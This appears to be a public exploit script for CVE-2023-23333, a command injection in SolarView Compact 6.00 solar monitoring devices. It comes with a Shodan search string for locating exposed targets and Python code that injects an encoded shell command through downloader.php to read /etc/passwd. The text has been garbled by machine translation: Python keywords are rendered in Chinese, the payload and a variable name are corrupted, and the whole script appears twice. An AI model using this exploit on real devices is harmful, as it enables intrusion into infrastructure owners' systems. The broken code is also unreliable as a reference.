#-利用标题: Solarview Compact 6.00-命令注射
#-Shodan Dork: http.html:的solarview compact'
#-利用作者: bittehunter
#-电子邮件:[email protected]
#-版本: 6.00
# - 在: 6.00上测试
#-CVE : CVE-2023-23333
导入argparse
导入请求
def vuln_check(ip_address,端口):
url=f'http://{ip_address} : {port}/downloader.php?file=; echo%20Y2F0IC9LDGMVMVCGFZCGFZCGFZCGFZCGCGCG%3DBase3ddmbase64%20-base64%20-dcashbashbashbashbashbash%00.zip'zip'Zip'Zip
响应=requests.get(url)
if antsphy.status_code==200:
output=response.text
如果输出:中的“根”
打印(“检测到的漏洞:命令注入可能。”)
打印(f'passwd文件content: \ n {response.text}')
其他:
打印(“未检测到漏洞”。)
其他:
打印('error:无法获取响应。')
def main():
parser=argparse.argumentparser(description='solarview compact命令注入')
parser.add_argument(' - i','-ip',help='目标设备的IP地址',必需=true)
parser.add_argument(' - p',' - port',help='目标设备的端口(default: 80)',默认值=80,type=int)
args=parser.parse_args()
ip_address=args.ip
端口=args.port
vuln_check(ip_address,端口)
如果name=='__ -Main __':
主要的()
#-Shodan Dork: http.html:的solarview compact'
#-利用作者: bittehunter
#-电子邮件:[email protected]
#-版本: 6.00
# - 在: 6.00上测试
#-CVE : CVE-2023-23333
导入argparse
导入请求
def vuln_check(ip_address,端口):
url=f'http://{ip_address} : {port}/downloader.php?file=; echo%20Y2F0IC9LDGMVMVCGFZCGFZCGFZCGFZCGCGCG%3DBase3ddmbase64%20-base64%20-dcashbashbashbashbashbash%00.zip'zip'Zip'Zip
响应=requests.get(url)
if antsphy.status_code==200:
output=response.text
如果输出:中的“根”
打印(“检测到的漏洞:命令注入可能。”)
打印(f'passwd文件content: \ n {response.text}')
其他:
打印(“未检测到漏洞”。)
其他:
打印('error:无法获取响应。')
def main():
parser=argparse.argumentparser(description='solarview compact命令注入')
parser.add_argument(' - i','-ip',help='目标设备的IP地址',必需=true)
parser.add_argument(' - p',' - port',help='目标设备的端口(default: 80)',默认值=80,type=int)
args=parser.parse_args()
ip_address=args.ip
端口=args.port
vuln_check(ip_address,端口)
如果name=='__ -Main __':
主要的()